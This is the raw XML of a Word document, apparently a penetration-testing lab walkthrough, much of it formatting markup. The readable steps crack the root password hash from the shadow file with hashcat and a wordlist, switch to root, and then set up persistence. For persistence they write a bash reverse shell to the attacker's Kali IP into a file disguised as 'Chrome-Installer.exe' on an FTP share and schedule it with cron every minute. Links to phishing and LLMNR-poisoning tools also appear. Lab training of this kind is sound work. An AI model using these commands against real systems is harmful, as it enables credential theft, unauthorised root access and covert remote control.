    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="001211A9" w14:textId="540C72A2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Cracking the Root Hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="467E5AD8" w14:textId="502AD8B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“root:” line from the shadow line and copy it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7E49C664" w14:textId="7AC25E8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Open a new tab in Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="06483629" w14:textId="2DAC5477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Type, “touch root_hash”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6920E5CA" w14:textId="20299FB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Type, “nano root_hash”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="70E62094" w14:textId="5910679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Paste contents into the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7629F7F8" w14:textId="4EE757E5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Save it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0853B6E9" w14:textId="2173927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 “cat root_hash”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1EF5C3CF" w14:textId="5EE6421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The hash values start with ‘$6$’ with is SHA-512</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5B3EBA83" w14:textId="2CC2E80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Type,”hashcat -m 1800 -a 0 root_hash /usr/share/wordlists/rockyou.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6B673D6D" w14:textId="4D795207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Takes a while to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25896527" w14:textId="4AED6714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You should get the root account password now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3B5E10C2" w14:textId="7937DFA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terminal, select the left-most tab,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="032D51AA" w14:textId="22EBC982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Type, “su root”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3693B923" w14:textId="4FA9BD0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password you cracked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="636F606A" w14:textId="58AEB94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 “whoami”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="29A18076" w14:textId="50480BAC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Commands are being run as root now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4EF21C1B" w14:textId="512B48B0">
      <w:pPr>
        <w:spacing w:after="160" w:afterAutospacing="off" w:line="257" w:lineRule="auto"/>
        <w:jc w:val="both"/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Establish Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="38E43D63" w14:textId="77697F6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 “ssh root@{victim’s IP address}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4BCB15FE" w14:textId="628B1C6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password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3FC9DF5E" w14:textId="37527BD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type,” touch /var/www/html/ftp/files/Chrome-Installer.exe” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="46FE54CB" w14:textId="65C2FD1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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="697730B3" w14:textId="79CFF498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“echo ‘bash -i &gt;&amp; /dev/tcp/{Kali IP addr}/443 0&gt;&amp;1’ &gt; /var/www/html/ftp/files/Chrome-Installer.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="52583196" w14:textId="04BD308E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Open a new tab in Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1FC06059" w14:textId="6B8D737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New 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 “nc -nvlp 443”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="086E26D9" w14:textId="7B8A56A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Select the left most tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="51F9C52F" w14:textId="0F7C23E8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Original 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type, “crontab -e”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4D59A06E" w14:textId="45DD307D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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In the editor, type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="40B9395C" w14:textId="3D64E1B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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*/1 * * * * bash /var/www/html/ftp/files/Chrome-Installer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6C48CAF9" w14:textId="3881113F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Exit editor mode by pressing CTRL+C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5D42ACDA" w14:textId="192E35C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the command, “:wq!”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7075BB6C" w14:textId="004753A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New Terminal</w:t>
      </w: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select the right most terminal tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3D4D8D7D" w14:textId="5996E76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>Enter “id”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="37108DD4" w14:textId="7289906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E9F89" w:rsidR="11A4D8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C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="0F5058A6" w14:textId="3D2DB676">
      <w:pPr>
        <w:spacing w:after="160" w:afterAutospacing="off" w:line="257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5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="50B51432" w14:textId="23563812">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="33D4F88D" w:rsidP="33D4F88D" w:rsidRDefault="33D4F88D" w14:paraId="4D63D981" w14:textId="65D31387">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="33D4F88D" w:rsidP="33D4F88D" w:rsidRDefault="33D4F88D" w14:paraId="28D36AB2" w14:textId="0DC5021A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2">
    <w:nsid w:val="2ed74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1">
    <w:nsid w:val="7421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0">
    <w:nsid w:val="57515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9">
    <w:nsid w:val="5f4d1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8">
    <w:nsid w:val="91dd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7">
    <w:nsid w:val="2d525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6">
    <w:nsid w:val="288e7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5">
    <w:nsid w:val="e733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4">
    <w:nsid w:val="3d1c0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3">
    <w:nsid w:val="5eb2f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2">
    <w:nsid w:val="3722f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1">
    <w:nsid w:val="6177c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0">
    <w:nsid w:val="38331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9">
    <w:nsid w:val="2ce09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8">
    <w:nsid w:val="72420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7">
    <w:nsid w:val="5ad5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6">
    <w:nsid w:val="130c8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5">
    <w:nsid w:val="3328e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4">
    <w:nsid w:val="19d5d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3">
    <w:nsid w:val="5333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2">
    <w:nsid w:val="2ed4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1">
    <w:nsid w:val="117ba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0">
    <w:nsid w:val="7b63d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9">
    <w:nsid w:val="5fb92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8">
    <w:nsid w:val="44b6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7">
    <w:nsid w:val="4419a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6">
    <w:nsid w:val="32c93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5">
    <w:nsid w:val="53501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4">
    <w:nsid w:val="608f5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3">
    <w:nsid w:val="37f4f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2">
    <w:nsid w:val="68f11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1">
    <w:nsid w:val="1c380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0">
    <w:nsid w:val="6b6f8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9">
    <w:nsid w:val="47125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8">
    <w:nsid w:val="3340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7">
    <w:nsid w:val="58ab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6">
    <w:nsid w:val="3f8e7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5">
    <w:nsid w:val="2435b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4">
    <w:nsid w:val="11d79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3">
    <w:nsid w:val="334ca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2">
    <w:nsid w:val="6901d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1">
    <w:nsid w:val="93723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0">
    <w:nsid w:val="5e2bf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9">
    <w:nsid w:val="7312e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8">
    <w:nsid w:val="7c4c6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7">
    <w:nsid w:val="7dec8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6">
    <w:nsid w:val="319aa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5">
    <w:nsid w:val="6047e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4">
    <w:nsid w:val="507ee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3">
    <w:nsid w:val="5c9e7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2">
    <w:nsid w:val="11289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1">
    <w:nsid w:val="2a07c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0">
    <w:nsid w:val="5f4b09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9">
    <w:nsid w:val="18bd8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8">
    <w:nsid w:val="2c57e4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7">
    <w:nsid w:val="1fda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6">
    <w:nsid w:val="f91d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5">
    <w:nsid w:val="56d0e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4">
    <w:nsid w:val="11120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3">
    <w:nsid w:val="1fb5a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2">
    <w:nsid w:val="68916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1">
    <w:nsid w:val="6e6849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0">
    <w:nsid w:val="6d4b4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9">
    <w:nsid w:val="5e92d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8">
    <w:nsid w:val="568e9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7">
    <w:nsid w:val="74b26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6">
    <w:nsid w:val="2339a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5">
    <w:nsid w:val="4a188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4">
    <w:nsid w:val="2a460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3">
    <w:nsid w:val="6aac4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2">
    <w:nsid w:val="43de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1">
    <w:nsid w:val="2aceb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0">
    <w:nsid w:val="425e0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9">
    <w:nsid w:val="1455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8">
    <w:nsid w:val="3db4f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7">
    <w:nsid w:val="7d4a8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6">
    <w:nsid w:val="59157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5">
    <w:nsid w:val="49d27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4">
    <w:nsid w:val="1cdf1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3">
    <w:nsid w:val="6518b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2">
    <w:nsid w:val="15ac6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1">
    <w:nsid w:val="50cd7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0">
    <w:nsid w:val="24d50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9">
    <w:nsid w:val="52fec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8">
    <w:nsid w:val="45b23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7">
    <w:nsid w:val="2d7f6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6">
    <w:nsid w:val="6237e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5">
    <w:nsid w:val="5f11d1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4">
    <w:nsid w:val="6bd4c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3">
    <w:nsid w:val="541d4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2">
    <w:nsid w:val="5cdc9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1">
    <w:nsid w:val="4bc86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0">
    <w:nsid w:val="56c59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9">
    <w:nsid w:val="9c25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8">
    <w:nsid w:val="56a95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7">
    <w:nsid w:val="7c8b1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6">
    <w:nsid w:val="7d222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5">
    <w:nsid w:val="1f9c8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4f36e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542d9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2">
    <w:nsid w:val="6dfce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1">
    <w:nsid w:val="7f95f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0">
    <w:nsid w:val="6458b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9">
    <w:nsid w:val="31d80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8">
    <w:nsid w:val="319ea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1bebd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40d8a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62abb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29121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214a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55b03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36946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27a5c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18258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315ff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7a90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5584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57d56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341e8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331a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505b9e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3e0ab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445e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62894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672cf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43825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4b48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744b7f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347df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52854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13428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54957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0">
    <w:nsid w:val="5c1cb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a6d3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de40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19051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1536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1816c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58de3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1845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2c6d6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28f5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8a85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123db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94fa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18276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5222d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37470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1b58e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38a28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adab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221b6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5feb69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40213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22178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2e5d7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127c0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43fd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3a6f6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2835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63ac7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6adad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4211a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78f7c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10a51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65d59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1d5e6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453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1eb79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68712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241a5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4aeff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e516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7e938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585b1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7adf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722ae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5921a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4a007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2dd5b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e20d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3410b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1dc7c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b0e4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c9db5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31428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150ea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3b372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e924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53e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3dee5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23742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72e2b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73119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1a01cd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e753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6a7a9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759b5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62100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d33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3847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5629a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fa07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2200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1421f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259b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c2ee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12a7f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2d43a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61020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52e60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6b3ef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a8cdd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4543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3e0ed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cf83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5780a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26fd67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6ea09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6c34c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6923b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410ba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7f15a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737c7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30c3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25ed7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51a8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c7e2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4287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edca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4947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e55c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303c2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56def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717b0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c6a9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21154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39efc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9333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4a26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7451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21565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3ac5f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cf6b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70ee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9887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4bda4b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c732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997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7a9b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5d78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e572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9320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9669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1c48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0e2f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f578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ef41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1b9a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ffbb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4a5a4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b58d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ee4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f9a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9df8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e906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257c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a04c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674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0d56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f4e3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8228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c07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2e04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0354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ef54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36e3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ece25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71c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d028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94cd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f1f9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1480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7d10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2b0c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9e04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adb7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e8c8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dee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f53a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bcb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44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1821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9eaa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e3c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31a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a4d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bd5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9c3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b37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39f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b45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2ab9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a1b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552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9d6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e777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02b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91f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71bf2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8ab6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546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802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0f3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a6b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870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851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46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ff5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6b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7e7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1ce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2">
    <w:abstractNumId w:val="322"/>
  </w:num>
  <w:num w:numId="321">
    <w:abstractNumId w:val="321"/>
  </w:num>
  <w:num w:numId="320">
    <w:abstractNumId w:val="320"/>
  </w:num>
  <w:num w:numId="319">
    <w:abstractNumId w:val="319"/>
  </w:num>
  <w:num w:numId="318">
    <w:abstractNumId w:val="318"/>
  </w:num>
  <w:num w:numId="317">
    <w:abstractNumId w:val="317"/>
  </w:num>
  <w:num w:numId="316">
    <w:abstractNumId w:val="316"/>
  </w:num>
  <w:num w:numId="315">
    <w:abstractNumId w:val="315"/>
  </w:num>
  <w:num w:numId="314">
    <w:abstractNumId w:val="314"/>
  </w:num>
  <w:num w:numId="313">
    <w:abstractNumId w:val="313"/>
  </w:num>
  <w:num w:numId="312">
    <w:abstractNumId w:val="312"/>
  </w:num>
  <w:num w:numId="311">
    <w:abstractNumId w:val="311"/>
  </w:num>
  <w:num w:numId="310">
    <w:abstractNumId w:val="310"/>
  </w:num>
  <w:num w:numId="309">
    <w:abstractNumId w:val="309"/>
  </w:num>
  <w:num w:numId="308">
    <w:abstractNumId w:val="308"/>
  </w:num>
  <w:num w:numId="307">
    <w:abstractNumId w:val="307"/>
  </w:num>
  <w:num w:numId="306">
    <w:abstractNumId w:val="306"/>
  </w:num>
  <w:num w:numId="305">
    <w:abstractNumId w:val="305"/>
  </w:num>
  <w:num w:numId="304">
    <w:abstractNumId w:val="304"/>
  </w:num>
  <w:num w:numId="303">
    <w:abstractNumId w:val="303"/>
  </w:num>
  <w:num w:numId="302">
    <w:abstractNumId w:val="302"/>
  </w:num>
  <w:num w:numId="301">
    <w:abstractNumId w:val="301"/>
  </w:num>
  <w:num w:numId="300">
    <w:abstractNumId w:val="300"/>
  </w:num>
  <w:num w:numId="299">
    <w:abstractNumId w:val="299"/>
  </w:num>
  <w:num w:numId="298">
    <w:abstractNumId w:val="298"/>
  </w:num>
  <w:num w:numId="297">
    <w:abstractNumId w:val="297"/>
  </w:num>
  <w:num w:numId="296">
    <w:abstractNumId w:val="296"/>
  </w:num>
  <w:num w:numId="295">
    <w:abstractNumId w:val="295"/>
  </w:num>
  <w:num w:numId="294">
    <w:abstractNumId w:val="294"/>
  </w:num>
  <w:num w:numId="293">
    <w:abstractNumId w:val="293"/>
  </w:num>
  <w:num w:numId="292">
    <w:abstractNumId w:val="292"/>
  </w:num>
  <w:num w:numId="291">
    <w:abstractNumId w:val="291"/>
  </w:num>
  <w:num w:numId="290">
    <w:abstractNumId w:val="290"/>
  </w:num>
  <w:num w:numId="289">
    <w:abstractNumId w:val="289"/>
  </w:num>
  <w:num w:numId="288">
    <w:abstractNumId w:val="288"/>
  </w:num>
  <w:num w:numId="287">
    <w:abstractNumId w:val="287"/>
  </w:num>
  <w:num w:numId="286">
    <w:abstractNumId w:val="286"/>
  </w:num>
  <w:num w:numId="285">
    <w:abstractNumId w:val="285"/>
  </w:num>
  <w:num w:numId="284">
    <w:abstractNumId w:val="284"/>
  </w:num>
  <w:num w:numId="283">
    <w:abstractNumId w:val="283"/>
  </w:num>
  <w:num w:numId="282">
    <w:abstractNumId w:val="282"/>
  </w:num>
  <w:num w:numId="281">
    <w:abstractNumId w:val="281"/>
  </w:num>
  <w:num w:numId="280">
    <w:abstractNumId w:val="280"/>
  </w:num>
  <w:num w:numId="279">
    <w:abstractNumId w:val="279"/>
  </w:num>
  <w:num w:numId="278">
    <w:abstractNumId w:val="278"/>
  </w:num>
  <w:num w:numId="277">
    <w:abstractNumId w:val="277"/>
  </w:num>
  <w:num w:numId="276">
    <w:abstractNumId w:val="276"/>
  </w:num>
  <w:num w:numId="275">
    <w:abstractNumId w:val="275"/>
  </w:num>
  <w:num w:numId="274">
    <w:abstractNumId w:val="274"/>
  </w:num>
  <w:num w:numId="273">
    <w:abstractNumId w:val="273"/>
  </w:num>
  <w:num w:numId="272">
    <w:abstractNumId w:val="272"/>
  </w:num>
  <w:num w:numId="271">
    <w:abstractNumId w:val="271"/>
  </w:num>
  <w:num w:numId="270">
    <w:abstractNumId w:val="270"/>
  </w:num>
  <w:num w:numId="269">
    <w:abstractNumId w:val="269"/>
  </w:num>
  <w:num w:numId="268">
    <w:abstractNumId w:val="268"/>
  </w:num>
  <w:num w:numId="267">
    <w:abstractNumId w:val="267"/>
  </w:num>
  <w:num w:numId="266">
    <w:abstractNumId w:val="266"/>
  </w:num>
  <w:num w:numId="265">
    <w:abstractNumId w:val="265"/>
  </w:num>
  <w:num w:numId="264">
    <w:abstractNumId w:val="264"/>
  </w:num>
  <w:num w:numId="263">
    <w:abstractNumId w:val="263"/>
  </w:num>
  <w:num w:numId="262">
    <w:abstractNumId w:val="262"/>
  </w:num>
  <w:num w:numId="261">
    <w:abstractNumId w:val="261"/>
  </w:num>
  <w:num w:numId="260">
    <w:abstractNumId w:val="260"/>
  </w:num>
  <w:num w:numId="259">
    <w:abstractNumId w:val="259"/>
  </w:num>
  <w:num w:numId="258">
    <w:abstractNumId w:val="258"/>
  </w:num>
  <w:num w:numId="257">
    <w:abstractNumId w:val="257"/>
  </w:num>
  <w:num w:numId="256">
    <w:abstractNumId w:val="256"/>
  </w:num>
  <w:num w:numId="255">
    <w:abstractNumId w:val="255"/>
  </w:num>
  <w:num w:numId="254">
    <w:abstractNumId w:val="254"/>
  </w:num>
  <w:num w:numId="253">
    <w:abstractNumId w:val="253"/>
  </w:num>
  <w:num w:numId="252">
    <w:abstractNumId w:val="252"/>
  </w:num>
  <w:num w:numId="251">
    <w:abstractNumId w:val="251"/>
  </w:num>
  <w:num w:numId="250">
    <w:abstractNumId w:val="250"/>
  </w:num>
  <w:num w:numId="249">
    <w:abstractNumId w:val="249"/>
  </w:num>
  <w:num w:numId="248">
    <w:abstractNumId w:val="248"/>
  </w:num>
  <w:num w:numId="247">
    <w:abstractNumId w:val="247"/>
  </w:num>
  <w:num w:numId="246">
    <w:abstractNumId w:val="246"/>
  </w:num>
  <w:num w:numId="245">
    <w:abstractNumId w:val="245"/>
  </w:num>
  <w:num w:numId="244">
    <w:abstractNumId w:val="244"/>
  </w:num>
  <w:num w:numId="243">
    <w:abstractNumId w:val="243"/>
  </w:num>
  <w:num w:numId="242">
    <w:abstractNumId w:val="242"/>
  </w:num>
  <w:num w:numId="241">
    <w:abstractNumId w:val="241"/>
  </w:num>
  <w:num w:numId="240">
    <w:abstractNumId w:val="240"/>
  </w:num>
  <w:num w:numId="239">
    <w:abstractNumId w:val="239"/>
  </w:num>
  <w:num w:numId="238">
    <w:abstractNumId w:val="238"/>
  </w:num>
  <w:num w:numId="237">
    <w:abstractNumId w:val="237"/>
  </w:num>
  <w:num w:numId="236">
    <w:abstractNumId w:val="236"/>
  </w:num>
  <w:num w:numId="235">
    <w:abstractNumId w:val="235"/>
  </w:num>
  <w:num w:numId="234">
    <w:abstractNumId w:val="234"/>
  </w:num>
  <w:num w:numId="233">
    <w:abstractNumId w:val="233"/>
  </w:num>
  <w:num w:numId="232">
    <w:abstractNumId w:val="232"/>
  </w:num>
  <w:num w:numId="231">
    <w:abstractNumId w:val="231"/>
  </w:num>
  <w:num w:numId="230">
    <w:abstractNumId w:val="230"/>
  </w:num>
  <w:num w:numId="229">
    <w:abstractNumId w:val="229"/>
  </w:num>
  <w:num w:numId="228">
    <w:abstractNumId w:val="228"/>
  </w:num>
  <w:num w:numId="227">
    <w:abstractNumId w:val="227"/>
  </w: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8193A"/>
    <w:rsid w:val="00728550"/>
    <w:rsid w:val="00CA30CD"/>
    <w:rsid w:val="036F2590"/>
    <w:rsid w:val="03DEAB78"/>
    <w:rsid w:val="0C5E9F89"/>
    <w:rsid w:val="1034803B"/>
    <w:rsid w:val="1102F273"/>
    <w:rsid w:val="11A4D87F"/>
    <w:rsid w:val="18C7221E"/>
    <w:rsid w:val="1D37930E"/>
    <w:rsid w:val="1E74EB58"/>
    <w:rsid w:val="26FC660C"/>
    <w:rsid w:val="28964612"/>
    <w:rsid w:val="2B243C05"/>
    <w:rsid w:val="2D518BF2"/>
    <w:rsid w:val="2D664BFC"/>
    <w:rsid w:val="33D4F88D"/>
    <w:rsid w:val="39AD9AE2"/>
    <w:rsid w:val="447889CA"/>
    <w:rsid w:val="49B2E04C"/>
    <w:rsid w:val="4A93490F"/>
    <w:rsid w:val="56B8D227"/>
    <w:rsid w:val="662EC938"/>
    <w:rsid w:val="695C41B7"/>
    <w:rsid w:val="6DC8193A"/>
    <w:rsid w:val="6EB151C4"/>
    <w:rsid w:val="7DC0C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193A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F848EC40-2E0C-4F4C-9C25-CEE1535163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sintframework.com/" TargetMode="External" Id="Rcd4971e988aa4e3a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Ra832aaadb1684b38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/htr-tech/zphisher" TargetMode="External" Id="R7192df80ba19402e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/" TargetMode="External" Id="R26c97d675b934175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/file-path-traversal" TargetMode="External" Id="R1f5e1ff7f09040c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/" TargetMode="External" Id="R5a0578499db4443e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl%20____________" TargetMode="External" Id="Rf8674882e6b64b20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R0f00b422def540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2023-10-05T18:35:13.9194478Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-13T19:25:03.6904615Z</dcterms:modified>
  <dc:creator>Reed, Richmond Gray</dc:creator>
  <lastModifiedBy>Bajracharya, Biju R</lastModifiedBy>
</coreProperties>
</file>